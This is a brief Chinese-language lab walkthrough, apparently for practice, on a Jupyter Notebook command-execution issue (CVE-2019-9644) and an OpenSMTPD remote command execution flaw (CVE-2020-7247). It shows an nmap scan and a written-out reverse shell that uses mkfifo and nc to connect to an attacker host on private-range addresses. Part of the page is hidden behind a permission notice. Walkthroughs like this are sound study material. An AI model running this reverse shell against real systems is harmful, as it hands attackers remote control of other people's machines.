(CVE-2019-9644)(CVE-2020-7247)
jupyter-notebook 命令执行 (CVE-2019-9644)
Jupyter Notebook是一套用于创建、共享代码和说明性文本文档的开源Web应用程序。 Jupyter Notebook可直接使用命令行执行任意命令。
点击右上角的new—-terminal,打开控制台进行命令输入:
OpenSMTPD 远程命令执行漏洞 (CVE-2020-7247)
信息收集:nmap 192.168.85.130 -p 8825 -sV
您没有 权限 查看此处内容!
反弹shell:mkfifo /tmp/wbjoqfy; nc 192.168.85.132 4444 0</tmp/wbjoqfy | /bin/sh >/tmp/wbjoqfy 2>&1; rm /tmp/wbjoqfy
